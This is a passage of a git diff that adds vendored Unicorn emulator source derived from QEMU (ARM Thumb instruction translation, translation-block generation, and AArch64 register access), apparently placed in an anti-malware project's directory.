*/ + qemu_log_mask(LOG_UNIMP, "arm: unimplemented setend\n"); + goto illegal_op; + } + break; + case 3: + /* cps */ + ARCH(6); + if (IS_USER(s)) { + break; + } + if (arm_dc_feature(s, ARM_FEATURE_M)) { + tmp = tcg_const_i32(tcg_ctx, (insn & (1 << 4)) != 0); + /* FAULTMASK */ + if (insn & 1) { + addr = tcg_const_i32(tcg_ctx, 19); + gen_helper_v7m_msr(tcg_ctx, tcg_ctx->cpu_env, addr, tmp); + tcg_temp_free_i32(tcg_ctx, addr); + } + /* PRIMASK */ + if (insn & 2) { + addr = tcg_const_i32(tcg_ctx, 16); + gen_helper_v7m_msr(tcg_ctx, tcg_ctx->cpu_env, addr, tmp); + tcg_temp_free_i32(tcg_ctx, addr); + } + tcg_temp_free_i32(tcg_ctx, tmp); + gen_lookup_tb(s); + } else { + if (insn & (1 << 4)) { + shift = CPSR_A | CPSR_I | CPSR_F; + } else { + shift = 0; + } + gen_set_psr_im(s, ((insn & 7) << 6), 0, shift); + } + break; + default: + goto undef; + } + break; + + default: + goto undef; + } + break; + + case 12: + { + /* load/store multiple */ + TCGv_i32 loaded_var; + TCGV_UNUSED_I32(loaded_var); + rn = (insn >> 8) & 0x7; + addr = load_reg(s, rn); + for (i = 0; i < 8; i++) { + if (insn & (1 << i)) { + if (insn & (1 << 11)) { + /* load */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + if (i == rn) { + loaded_var = tmp; + } else { + store_reg(s, i, tmp); + } + } else { + /* store */ + tmp = load_reg(s, i); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + } + /* advance to the next address */ + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + } + } + if ((insn & (1 << rn)) == 0) { + /* base reg not in list: base register writeback */ + store_reg(s, rn, addr); + } else { + /* base reg in list: if load, complete it now */ + if (insn & (1 << 11)) { + store_reg(s, rn, loaded_var); + } + tcg_temp_free_i32(tcg_ctx, addr); + } + break; + } + case 13: + /* conditional branch or swi */ + cond = (insn >> 8) & 0xf; + if (cond == 0xe) + goto undef; + + if (cond == 0xf) { + /* swi */ + gen_set_pc_im(s, s->pc); + s->svc_imm = 
extract32(insn, 0, 8); + s->is_jmp = DISAS_SWI; + break; + } + /* generate a conditional jump to next instruction */ + s->condlabel = gen_new_label(tcg_ctx); + arm_gen_test_cc(tcg_ctx, cond ^ 1, s->condlabel); + s->condjmp = 1; + + /* jump to the offset */ + val = (uint32_t)s->pc + 2; + offset = ((int32_t)((uint32_t)insn << 24)) >> 24; + val += (int32_t)((uint32_t)offset << 1); + gen_jmp(s, val); + break; + + case 14: + if (insn & (1 << 11)) { + if (disas_thumb2_insn(env, s, insn)) + goto undef32; + break; + } + /* unconditional branch */ + val = (uint32_t)s->pc; + offset = ((int32_t)((uint32_t)insn << 21)) >> 21; + val += (int32_t)((uint32_t)offset << 1) + 2; + gen_jmp(s, val); + break; + + case 15: + if (disas_thumb2_insn(env, s, insn)) + goto undef32; + break; + } + + return; +undef32: + gen_exception_insn(s, 4, EXCP_UDEF, syn_uncategorized()); + return; +illegal_op: +undef: + gen_exception_insn(s, 2, EXCP_UDEF, syn_uncategorized()); +} + +/* generate intermediate code in gen_opc_buf and gen_opparam_buf for + basic block 'tb'. If search_pc is TRUE, also generate PC + information for each intermediate instruction. */ +static inline void gen_intermediate_code_internal(ARMCPU *cpu, + TranslationBlock *tb, + bool search_pc) +{ + CPUState *cs = CPU(cpu); + CPUARMState *env = &cpu->env; + DisasContext dc1, *dc = &dc1; + CPUBreakpoint *bp; + uint16_t *gen_opc_end; + int j, lj; + target_ulong pc_start; + target_ulong next_page_start; + int num_insns; + int max_insns; + TCGContext *tcg_ctx = env->uc->tcg_ctx; + bool block_full = false; + + /* generate intermediate code */ + + /* The A64 decoder has its own top level loop, because it doesn't need + * the A32/T32 complexity to do with conditional execution/IT blocks/etc. 
+ */ + if (ARM_TBFLAG_AARCH64_STATE(tb->flags)) { + gen_intermediate_code_internal_a64(cpu, tb, search_pc); + return; + } + + pc_start = tb->pc; + + dc->uc = env->uc; + dc->tb = tb; + + gen_opc_end = tcg_ctx->gen_opc_buf + OPC_MAX_SIZE; + + dc->is_jmp = DISAS_NEXT; + dc->pc = pc_start; + + dc->singlestep_enabled = cs->singlestep_enabled; + dc->condjmp = 0; + + dc->aarch64 = 0; + dc->thumb = ARM_TBFLAG_THUMB(tb->flags); // qq + dc->bswap_code = ARM_TBFLAG_BSWAP_CODE(tb->flags); + dc->condexec_mask = (ARM_TBFLAG_CONDEXEC(tb->flags) & 0xf) << 1; + dc->condexec_cond = ARM_TBFLAG_CONDEXEC(tb->flags) >> 4; +#if !defined(CONFIG_USER_ONLY) + dc->user = (ARM_TBFLAG_PRIV(tb->flags) == 0); +#endif + dc->cpacr_fpen = ARM_TBFLAG_CPACR_FPEN(tb->flags); + dc->vfp_enabled = ARM_TBFLAG_VFPEN(tb->flags); + dc->vec_len = ARM_TBFLAG_VECLEN(tb->flags); + dc->vec_stride = ARM_TBFLAG_VECSTRIDE(tb->flags); + dc->c15_cpar = ARM_TBFLAG_XSCALE_CPAR(tb->flags); + dc->cp_regs = cpu->cp_regs; + dc->current_el = arm_current_el(env); + dc->features = env->features; + + /* Single step state. The code-generation logic here is: + * SS_ACTIVE == 0: + * generate code with no special handling for single-stepping (except + * that anything that can make us go to SS_ACTIVE == 1 must end the TB; + * this happens anyway because those changes are all system register or + * PSTATE writes). 
+ * SS_ACTIVE == 1, PSTATE.SS == 1: (active-not-pending) + * emit code for one insn + * emit code to clear PSTATE.SS + * emit code to generate software step exception for completed step + * end TB (as usual for having generated an exception) + * SS_ACTIVE == 1, PSTATE.SS == 0: (active-pending) + * emit code to generate a software step exception + * end the TB + */ + dc->ss_active = ARM_TBFLAG_SS_ACTIVE(tb->flags); + dc->pstate_ss = ARM_TBFLAG_PSTATE_SS(tb->flags); + dc->is_ldex = false; + dc->ss_same_el = false; /* Can't be true since EL_d must be AArch64 */ + + tcg_ctx->cpu_F0s = tcg_temp_new_i32(tcg_ctx); + tcg_ctx->cpu_F1s = tcg_temp_new_i32(tcg_ctx); + tcg_ctx->cpu_F0d = tcg_temp_new_i64(tcg_ctx); + tcg_ctx->cpu_F1d = tcg_temp_new_i64(tcg_ctx); + tcg_ctx->cpu_V0 = tcg_ctx->cpu_F0d; + tcg_ctx->cpu_V1 = tcg_ctx->cpu_F1d; + /* FIXME: tcg_ctx->cpu_M0 can probably be the same as tcg_ctx->cpu_V0. */ + tcg_ctx->cpu_M0 = tcg_temp_new_i64(tcg_ctx); + next_page_start = (pc_start & TARGET_PAGE_MASK) + TARGET_PAGE_SIZE; + lj = -1; + num_insns = 0; + max_insns = tb->cflags & CF_COUNT_MASK; + if (max_insns == 0) + max_insns = CF_COUNT_MASK; + + tcg_clear_temp_count(); + + // Unicorn: early check to see if the address of this block is the until address + if (tb->pc == env->uc->addr_end) { + // imitate WFI instruction to halt emulation + gen_tb_start(tcg_ctx); + dc->is_jmp = DISAS_WFI; + goto tb_end; + } + + // Unicorn: trace this block on request + // Only hook this block if it is not broken from previous translation due to + // full translation cache + if (!env->uc->block_full && HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_BLOCK, pc_start)) { + // save block address to see if we need to patch block size later + env->uc->block_addr = pc_start; + env->uc->size_arg = tcg_ctx->gen_opparam_buf - tcg_ctx->gen_opparam_ptr + 1; + gen_uc_tracecode(tcg_ctx, 0xf8f8f8f8, UC_HOOK_BLOCK_IDX, env->uc, pc_start); + } else { + env->uc->size_arg = -1; + } + + gen_tb_start(tcg_ctx); + + /* A note on 
handling of the condexec (IT) bits: + * + * We want to avoid the overhead of having to write the updated condexec + * bits back to the CPUARMState for every instruction in an IT block. So: + * (1) if the condexec bits are not already zero then we write + * zero back into the CPUARMState now. This avoids complications trying + * to do it at the end of the block. (For example if we don't do this + * it's hard to identify whether we can safely skip writing condexec + * at the end of the TB, which we definitely want to do for the case + * where a TB doesn't do anything with the IT state at all.) + * (2) if we are going to leave the TB then we call gen_set_condexec() + * which will write the correct value into CPUARMState if zero is wrong. + * This is done both for leaving the TB at the end, and for leaving + * it because of an exception we know will happen, which is done in + * gen_exception_insn(). The latter is necessary because we need to + * leave the TB with the PC/IT state just prior to execution of the + * instruction which caused the exception. + * (3) if we leave the TB unexpectedly (eg a data abort on a load) + * then the CPUARMState will be wrong and we need to reset it. + * This is handled in the same way as restoration of the + * PC in these situations: we will be called again with search_pc=1 + * and generate a mapping of the condexec bits for each PC in + * gen_opc_condexec_bits[]. restore_state_to_opc() then uses + * this to restore the condexec bits. + * + * Note that there are no instructions which can read the condexec + * bits, and none which can write non-static values to them, so + * we don't need to care about whether CPUARMState is correct in the + * middle of a TB. + */ + + /* Reset the conditional execution bits immediately. This avoids + complications trying to do it at the end of the block. 
*/ + if (dc->condexec_mask || dc->condexec_cond) + { + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, 0); + store_cpu_field(tcg_ctx, tmp, condexec_bits); + } + do { + //printf(">>> arm pc = %x\n", dc->pc); +#ifdef CONFIG_USER_ONLY + /* Intercept jump to the magic kernel page. */ + if (dc->pc >= 0xffff0000) { + /* We always get here via a jump, so know we are not in a + conditional execution block. */ + gen_exception_internal(dc, EXCP_KERNEL_TRAP); + dc->is_jmp = DISAS_UPDATE; + break; + } +#else + if (dc->pc >= 0xfffffff0 && arm_dc_feature(dc, ARM_FEATURE_M)) { + /* We always get here via a jump, so know we are not in a + conditional execution block. */ + gen_exception_internal(dc, EXCP_EXCEPTION_EXIT); + dc->is_jmp = DISAS_UPDATE; + break; + } +#endif + + if (unlikely(!QTAILQ_EMPTY(&cs->breakpoints))) { + QTAILQ_FOREACH(bp, &cs->breakpoints, entry) { + if (bp->pc == dc->pc) { + gen_exception_internal_insn(dc, 0, EXCP_DEBUG); + /* Advance PC so that clearing the breakpoint will + invalidate this TB. */ + dc->pc += 2; + goto done_generating; + } + } + } + if (search_pc) { + j = tcg_ctx->gen_opc_ptr - tcg_ctx->gen_opc_buf; + if (lj < j) { + lj++; + while (lj < j) + tcg_ctx->gen_opc_instr_start[lj++] = 0; + } + tcg_ctx->gen_opc_pc[lj] = dc->pc; + tcg_ctx->gen_opc_condexec_bits[lj] = (dc->condexec_cond << 4) | (dc->condexec_mask >> 1); + tcg_ctx->gen_opc_instr_start[lj] = 1; + //tcg_ctx->gen_opc_icount[lj] = num_insns; + } + + //if (num_insns + 1 == max_insns && (tb->cflags & CF_LAST_IO)) + // gen_io_start(); + + if (unlikely(qemu_loglevel_mask(CPU_LOG_TB_OP | CPU_LOG_TB_OP_OPT))) { + tcg_gen_debug_insn_start(tcg_ctx, dc->pc); + } + + if (dc->ss_active && !dc->pstate_ss) { + /* Singlestep state is Active-pending. 
+ * If we're in this state at the start of a TB then either + * a) we just took an exception to an EL which is being debugged + * and this is the first insn in the exception handler + * b) debug exceptions were masked and we just unmasked them + * without changing EL (eg by clearing PSTATE.D) + * In either case we're going to take a swstep exception in the + * "did not step an insn" case, and so the syndrome ISV and EX + * bits should be zero. + */ + assert(num_insns == 0); + gen_exception(dc, EXCP_UDEF, syn_swstep(dc->ss_same_el, 0, 0)); + goto done_generating; + } + + if (dc->thumb) { // qq + disas_thumb_insn(env, dc); + if (dc->condexec_mask) { + dc->condexec_cond = (dc->condexec_cond & 0xe) + | ((dc->condexec_mask >> 4) & 1); + dc->condexec_mask = (dc->condexec_mask << 1) & 0x1f; + if (dc->condexec_mask == 0) { + dc->condexec_cond = 0; + } + } + } else { + unsigned int insn; + + // end address tells us to stop emulation + if (dc->pc == dc->uc->addr_end) { + // imitate WFI instruction to halt emulation + dc->is_jmp = DISAS_WFI; + } else { + insn = arm_ldl_code(env, dc->pc, dc->bswap_code); + dc->pc += 4; + disas_arm_insn(dc, insn); + } + } + + if (dc->condjmp && !dc->is_jmp) { + gen_set_label(tcg_ctx, dc->condlabel); + dc->condjmp = 0; + } + + if (tcg_check_temp_count()) { + fprintf(stderr, "TCG temporary leak before "TARGET_FMT_lx"\n", + dc->pc); + } + + /* Translation stops when a conditional branch is encountered. + * Otherwise the subsequent code could get translated several times. + * Also stop translation when a page boundary is reached. This + * ensures prefetch aborts occur at the right place. */ + num_insns ++; + } while (!dc->is_jmp && tcg_ctx->gen_opc_ptr < gen_opc_end && + !cs->singlestep_enabled && + !dc->ss_active && + dc->pc < next_page_start && + num_insns < max_insns); + + if (tb->cflags & CF_LAST_IO) { + if (dc->condjmp) { + /* FIXME: This can theoretically happen with self-modifying + code. 
*/ + cpu_abort(cs, "IO on conditional branch instruction"); + } + //gen_io_end(); + } + + /* if too long translation, save this info */ + if (tcg_ctx->gen_opc_ptr >= gen_opc_end || num_insns >= max_insns) { + block_full = true; + } + +tb_end: + + /* At this stage dc->condjmp will only be set when the skipped + instruction was a conditional branch or trap, and the PC has + already been written. */ + if (unlikely(cs->singlestep_enabled || dc->ss_active)) { + /* Make sure the pc is updated, and raise a debug exception. */ + if (dc->condjmp) { + gen_set_condexec(dc); + if (dc->is_jmp == DISAS_SWI) { + gen_ss_advance(dc); + gen_exception(dc, EXCP_SWI, syn_aa32_svc(dc->svc_imm, dc->thumb)); + } else if (dc->is_jmp == DISAS_HVC) { + gen_ss_advance(dc); + gen_exception(dc, EXCP_HVC, syn_aa32_hvc(dc->svc_imm)); + } else if (dc->is_jmp == DISAS_SMC) { + gen_ss_advance(dc); + gen_exception(dc, EXCP_SMC, syn_aa32_smc()); + } else if (dc->ss_active) { + gen_step_complete_exception(dc); + } else { + gen_exception_internal(dc, EXCP_DEBUG); + } + gen_set_label(tcg_ctx, dc->condlabel); + } + if (dc->condjmp || !dc->is_jmp) { + gen_set_pc_im(dc, dc->pc); + dc->condjmp = 0; + } + gen_set_condexec(dc); + if (dc->is_jmp == DISAS_SWI && !dc->condjmp) { + gen_ss_advance(dc); + gen_exception(dc, EXCP_SWI, syn_aa32_svc(dc->svc_imm, dc->thumb)); + } else if (dc->is_jmp == DISAS_HVC && !dc->condjmp) { + gen_ss_advance(dc); + gen_exception(dc, EXCP_HVC, syn_aa32_hvc(dc->svc_imm)); + } else if (dc->is_jmp == DISAS_SMC && !dc->condjmp) { + gen_ss_advance(dc); + gen_exception(dc, EXCP_SMC, syn_aa32_smc()); + } else if (dc->ss_active) { + gen_step_complete_exception(dc); + } else { + /* FIXME: Single stepping a WFI insn will not halt + the CPU. 
*/ + gen_exception_internal(dc, EXCP_DEBUG); + } + } else { + /* While branches must always occur at the end of an IT block, + there are a few other things that can cause us to terminate + the TB in the middle of an IT block: + - Exception generating instructions (bkpt, swi, undefined). + - Page boundaries. + - Hardware watchpoints. + Hardware breakpoints have already been handled and skip this code. + */ + gen_set_condexec(dc); + switch(dc->is_jmp) { + case DISAS_NEXT: + gen_goto_tb(dc, 1, dc->pc); + break; + default: + case DISAS_JUMP: + case DISAS_UPDATE: + /* indicate that the hash table must be used to find the next TB */ + tcg_gen_exit_tb(tcg_ctx, 0); + break; + case DISAS_TB_JUMP: + /* nothing more to generate */ + break; + case DISAS_WFI: + gen_helper_wfi(tcg_ctx, tcg_ctx->cpu_env); + break; + case DISAS_WFE: + gen_helper_wfe(tcg_ctx, tcg_ctx->cpu_env); + break; + case DISAS_SWI: + gen_exception(dc, EXCP_SWI, syn_aa32_svc(dc->svc_imm, dc->thumb)); + break; + case DISAS_HVC: + gen_exception(dc, EXCP_HVC, syn_aa32_hvc(dc->svc_imm)); + break; + case DISAS_SMC: + gen_exception(dc, EXCP_SMC, syn_aa32_smc()); + break; + } + if (dc->condjmp) { + gen_set_label(tcg_ctx, dc->condlabel); + gen_set_condexec(dc); + gen_goto_tb(dc, 1, dc->pc); + dc->condjmp = 0; + } + } + +done_generating: + gen_tb_end(tcg_ctx, tb, num_insns); + *tcg_ctx->gen_opc_ptr = INDEX_op_end; + + if (search_pc) { + j = tcg_ctx->gen_opc_ptr - tcg_ctx->gen_opc_buf; + lj++; + while (lj <= j) + tcg_ctx->gen_opc_instr_start[lj++] = 0; + } else { + tb->size = dc->pc - pc_start; + //tb->icount = num_insns; + } + + env->uc->block_full = block_full; +} + +void gen_intermediate_code(CPUARMState *env, TranslationBlock *tb) +{ + gen_intermediate_code_internal(arm_env_get_cpu(env), tb, false); +} + +void gen_intermediate_code_pc(CPUARMState *env, TranslationBlock *tb) +{ + gen_intermediate_code_internal(arm_env_get_cpu(env), tb, true); +} + +#if 0 +static const char *cpu_mode_names[16] = { + "usr", "fiq", 
"irq", "svc", "???", "???", "mon", "abt", + "???", "???", "hyp", "und", "???", "???", "???", "sys" +}; + +void arm_cpu_dump_state(CPUState *cs, FILE *f, fprintf_function cpu_fprintf, + int flags) +{ + ARMCPU *cpu = ARM_CPU(cs); + CPUARMState *env = &cpu->env; + int i; + uint32_t psr; + + if (is_a64(env)) { + aarch64_cpu_dump_state(cs, f, cpu_fprintf, flags); + return; + } + + for(i=0;i<16;i++) { + cpu_fprintf(f, "R%02d=%08x", i, env->regs[i]); + if ((i % 4) == 3) + cpu_fprintf(f, "\n"); + else + cpu_fprintf(f, " "); + } + psr = cpsr_read(env); + cpu_fprintf(f, "PSR=%08x %c%c%c%c %c %s%d\n", + psr, + psr & (1 << 31) ? 'N' : '-', + psr & (1 << 30) ? 'Z' : '-', + psr & (1 << 29) ? 'C' : '-', + psr & (1 << 28) ? 'V' : '-', + psr & CPSR_T ? 'T' : 'A', + cpu_mode_names[psr & 0xf], (psr & 0x10) ? 32 : 26); + + if (flags & CPU_DUMP_FPU) { + int numvfpregs = 0; + if (arm_feature(env, ARM_FEATURE_VFP)) { + numvfpregs += 16; + } + if (arm_feature(env, ARM_FEATURE_VFP3)) { + numvfpregs += 16; + } + for (i = 0; i < numvfpregs; i++) { + uint64_t v = float64_val(env->vfp.regs[i]); + cpu_fprintf(f, "s%02d=%08x s%02d=%08x d%02d=%016" PRIx64 "\n", + i * 2, (uint32_t)v, + i * 2 + 1, (uint32_t)(v >> 32), + i, v); + } + cpu_fprintf(f, "FPSCR: %08x\n", (int)env->vfp.xregs[ARM_VFP_FPSCR]); + } +} +#endif + +void restore_state_to_opc(CPUARMState *env, TranslationBlock *tb, int pc_pos) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + if (is_a64(env)) { + env->pc = tcg_ctx->gen_opc_pc[pc_pos]; + env->condexec_bits = 0; + } else { + env->regs[15] = tcg_ctx->gen_opc_pc[pc_pos]; + env->condexec_bits = tcg_ctx->gen_opc_condexec_bits[pc_pos]; + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/translate.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/translate.h new file mode 100644 index 0000000..44b160f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/translate.h @@ -0,0 +1,116 @@ +#ifndef TARGET_ARM_TRANSLATE_H +#define 
TARGET_ARM_TRANSLATE_H + +/* internal defines */ +typedef struct DisasContext { + target_ulong pc; + uint32_t insn; + int is_jmp; + /* Nonzero if this instruction has been conditionally skipped. */ + int condjmp; + /* The label that will be jumped to when the instruction is skipped. */ + int condlabel; + /* Thumb-2 conditional execution bits. */ + int condexec_mask; + int condexec_cond; + struct TranslationBlock *tb; + int singlestep_enabled; + int thumb; + int bswap_code; +#if !defined(CONFIG_USER_ONLY) + int user; +#endif + bool cpacr_fpen; /* FP enabled via CPACR.FPEN */ + bool vfp_enabled; /* FP enabled via FPSCR.EN */ + int vec_len; + int vec_stride; + /* Immediate value in AArch32 SVC insn; must be set if is_jmp == DISAS_SWI + * so that top level loop can generate correct syndrome information. + */ + uint32_t svc_imm; + int aarch64; + int current_el; + GHashTable *cp_regs; + uint64_t features; /* CPU features bits */ + /* Because unallocated encodings generate different exception syndrome + * information from traps due to FP being disabled, we can't do a single + * "is fp access disabled" check at a high level in the decode tree. + * To help in catching bugs where the access check was forgotten in some + * code path, we set this flag when the access check is done, and assert + * that it is set at the point where we actually touch the FP regs. + */ + bool fp_access_checked; + /* ARMv8 single-step state (this is distinct from the QEMU gdbstub + * single-step support). + */ + bool ss_active; + bool pstate_ss; + /* True if the insn just emitted was a load-exclusive instruction + * (necessary for syndrome information for single step exceptions), + * ie A64 LDX*, LDAX*, A32/T32 LDREX*, LDAEX*. 
+ */ + bool is_ldex; + /* True if a single-step exception will be taken to the current EL */ + bool ss_same_el; + /* Bottom two bits of XScale c15_cpar coprocessor access control reg */ + int c15_cpar; +#define TMP_A64_MAX 16 + int tmp_a64_count; + TCGv_i64 tmp_a64[TMP_A64_MAX]; + + // Unicorn engine + struct uc_struct *uc; +} DisasContext; + + +static inline int arm_dc_feature(DisasContext *dc, int feature) +{ + return (dc->features & (1ULL << feature)) != 0; +} + +static inline int get_mem_index(DisasContext *s) +{ + return s->current_el; +} + +/* target-specific extra values for is_jmp */ +/* These instructions trap after executing, so the A32/T32 decoder must + * defer them until after the conditional execution state has been updated. + * WFI also needs special handling when single-stepping. + */ +#define DISAS_WFI 4 +#define DISAS_SWI 5 +/* For instructions which unconditionally cause an exception we can skip + * emitting unreachable code at the end of the TB in the A64 decoder + */ +#define DISAS_EXC 6 +/* WFE */ +#define DISAS_WFE 7 +#define DISAS_HVC 8 +#define DISAS_SMC 9 + +#ifdef TARGET_AARCH64 +void a64_translate_init(struct uc_struct *uc); +void gen_intermediate_code_internal_a64(ARMCPU *cpu, + TranslationBlock *tb, + bool search_pc); +void gen_a64_set_pc_im(DisasContext *s, uint64_t val); +#else +static inline void a64_translate_init(struct uc_struct *uc) +{ +} + +static inline void gen_intermediate_code_internal_a64(ARMCPU *cpu, + TranslationBlock *tb, + bool search_pc) +{ +} + +static inline void gen_a64_set_pc_im(uint64_t val) +{ +} +#endif + +void arm_gen_test_cc(TCGContext *tcg_ctx, int cc, int label); + +#endif /* TARGET_ARM_TRANSLATE_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/unicorn.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/unicorn.h new file mode 100644 index 0000000..a65b072 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/unicorn.h @@ -0,0 +1,29 @@ +/* Unicorn Emulator 
Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#ifndef UC_QEMU_TARGET_ARM_H +#define UC_QEMU_TARGET_ARM_H + +// functions to read & write registers +int arm_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count); +int arm_reg_write(struct uc_struct *uc, unsigned int *regs, void *const *vals, int count); +int arm64_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count); +int arm64_reg_write(struct uc_struct *uc, unsigned int *regs, void *const *vals, int count); + +void arm_reg_reset(struct uc_struct *uc); +void arm64_reg_reset(struct uc_struct *uc); + +DEFAULT_VISIBILITY +void arm_uc_init(struct uc_struct* uc); +void armeb_uc_init(struct uc_struct* uc); + +DEFAULT_VISIBILITY +void arm64_uc_init(struct uc_struct* uc); +void arm64eb_uc_init(struct uc_struct* uc); + +extern const int ARM_REGS_STORAGE_SIZE_arm; +extern const int ARM_REGS_STORAGE_SIZE_armeb; +extern const int ARM64_REGS_STORAGE_SIZE_aarch64; +extern const int ARM64_REGS_STORAGE_SIZE_aarch64eb; + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/unicorn_aarch64.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/unicorn_aarch64.c new file mode 100644 index 0000000..42bd7cc --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/unicorn_aarch64.c @@ -0,0 +1,248 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#include "hw/boards.h" +#include "hw/arm/arm.h" +#include "sysemu/cpus.h" +#include "unicorn.h" +#include "cpu.h" +#include "unicorn_common.h" +#include "uc_priv.h" + + +const int ARM64_REGS_STORAGE_SIZE = offsetof(CPUARMState, tlb_table); + +static void arm64_set_pc(struct uc_struct *uc, uint64_t address) +{ + ((CPUARMState *)uc->current_cpu->env_ptr)->pc = address; +} + +void arm64_release(void* ctx); + +void arm64_release(void* ctx) +{ + struct uc_struct* uc; + ARMCPU* cpu; + TCGContext *s = (TCGContext *) ctx; + + g_free(s->tb_ctx.tbs); + uc = s->uc; + cpu = (ARMCPU*) uc->cpu; + 
g_free(cpu->cpreg_indexes); + g_free(cpu->cpreg_values); + g_free(cpu->cpreg_vmstate_indexes); + g_free(cpu->cpreg_vmstate_values); + + release_common(ctx); +} + +void arm64_reg_reset(struct uc_struct *uc) +{ + CPUArchState *env = uc->cpu->env_ptr; + memset(env->xregs, 0, sizeof(env->xregs)); + + env->pc = 0; +} + +int arm64_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count) +{ + CPUState *mycpu = uc->cpu; + int i; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + void *value = vals[i]; + // V & Q registers are the same + if (regid >= UC_ARM64_REG_V0 && regid <= UC_ARM64_REG_V31) { + regid += UC_ARM64_REG_Q0 - UC_ARM64_REG_V0; + } + if (regid >= UC_ARM64_REG_X0 && regid <= UC_ARM64_REG_X28) { + *(int64_t *)value = ARM_CPU(uc, mycpu)->env.xregs[regid - UC_ARM64_REG_X0]; + } else if (regid >= UC_ARM64_REG_W0 && regid <= UC_ARM64_REG_W30) { + *(int32_t *)value = READ_DWORD(ARM_CPU(uc, mycpu)->env.xregs[regid - UC_ARM64_REG_W0]); + } else if (regid >= UC_ARM64_REG_Q0 && regid <= UC_ARM64_REG_Q31) { + float64 *dst = (float64*) value; + uint32_t reg_index = 2*(regid - UC_ARM64_REG_Q0); + dst[0] = ARM_CPU(uc, mycpu)->env.vfp.regs[reg_index]; + dst[1] = ARM_CPU(uc, mycpu)->env.vfp.regs[reg_index+1]; + } else if (regid >= UC_ARM64_REG_D0 && regid <= UC_ARM64_REG_D31) { + *(float64*)value = ARM_CPU(uc, mycpu)->env.vfp.regs[2*(regid - UC_ARM64_REG_D0)]; + } else if (regid >= UC_ARM64_REG_S0 && regid <= UC_ARM64_REG_S31) { + *(int32_t*)value = READ_DWORD(ARM_CPU(uc, mycpu)->env.vfp.regs[2*(regid - UC_ARM64_REG_S0)]); + } else if (regid >= UC_ARM64_REG_H0 && regid <= UC_ARM64_REG_H31) { + *(int16_t*)value = READ_WORD(ARM_CPU(uc, mycpu)->env.vfp.regs[2*(regid - UC_ARM64_REG_H0)]); + } else if (regid >= UC_ARM64_REG_B0 && regid <= UC_ARM64_REG_B31) { + *(int8_t*)value = READ_BYTE_L(ARM_CPU(uc, mycpu)->env.vfp.regs[2*(regid - UC_ARM64_REG_B0)]); + } else if (regid >= UC_ARM64_REG_ELR_EL0 && regid <= UC_ARM64_REG_ELR_EL3) { + 
*(uint64_t*)value = ARM_CPU(uc, mycpu)->env.elr_el[regid - UC_ARM64_REG_ELR_EL0]; + } else if (regid >= UC_ARM64_REG_SP_EL0 && regid <= UC_ARM64_REG_SP_EL3) { + *(uint64_t*)value = ARM_CPU(uc, mycpu)->env.sp_el[regid - UC_ARM64_REG_SP_EL0]; + } else if (regid >= UC_ARM64_REG_ESR_EL0 && regid <= UC_ARM64_REG_ESR_EL3) { + *(uint64_t*)value = ARM_CPU(uc, mycpu)->env.cp15.esr_el[regid - UC_ARM64_REG_ESR_EL0]; + } else if (regid >= UC_ARM64_REG_FAR_EL0 && regid <= UC_ARM64_REG_FAR_EL3) { + *(uint64_t*)value = ARM_CPU(uc, mycpu)->env.cp15.far_el[regid - UC_ARM64_REG_FAR_EL0]; + } else if (regid >= UC_ARM64_REG_VBAR_EL0 && regid <= UC_ARM64_REG_VBAR_EL3) { + *(uint64_t*)value = ARM_CPU(uc, mycpu)->env.cp15.vbar_el[regid - UC_ARM64_REG_VBAR_EL0]; + } else { + switch(regid) { + default: break; + case UC_ARM64_REG_CPACR_EL1: + *(uint32_t *)value = ARM_CPU(uc, mycpu)->env.cp15.c1_coproc; + break; + case UC_ARM64_REG_TPIDR_EL0: + *(int64_t *)value = ARM_CPU(uc, mycpu)->env.cp15.tpidr_el0; + break; + case UC_ARM64_REG_TPIDRRO_EL0: + *(int64_t *)value = ARM_CPU(uc, mycpu)->env.cp15.tpidrro_el0; + break; + case UC_ARM64_REG_TPIDR_EL1: + *(int64_t *)value = ARM_CPU(uc, mycpu)->env.cp15.tpidr_el1; + break; + case UC_ARM64_REG_X29: + *(int64_t *)value = ARM_CPU(uc, mycpu)->env.xregs[29]; + break; + case UC_ARM64_REG_X30: + *(int64_t *)value = ARM_CPU(uc, mycpu)->env.xregs[30]; + break; + case UC_ARM64_REG_PC: + *(uint64_t *)value = ARM_CPU(uc, mycpu)->env.pc; + break; + case UC_ARM64_REG_SP: + *(int64_t *)value = ARM_CPU(uc, mycpu)->env.xregs[31]; + break; + case UC_ARM64_REG_NZCV: + *(int32_t *)value = cpsr_read(&ARM_CPU(uc, mycpu)->env) & CPSR_NZCV; + break; + case UC_ARM64_REG_PSTATE: + *(uint32_t *)value = pstate_read(&ARM_CPU(uc, mycpu)->env); + break; + case UC_ARM64_REG_TTBR0_EL1: + *(uint64_t *)value = ARM_CPU(uc, mycpu)->env.cp15.ttbr0_el1; + break; + case UC_ARM64_REG_TTBR1_EL1: + *(uint64_t *)value = ARM_CPU(uc, mycpu)->env.cp15.ttbr1_el1; + break; + case 
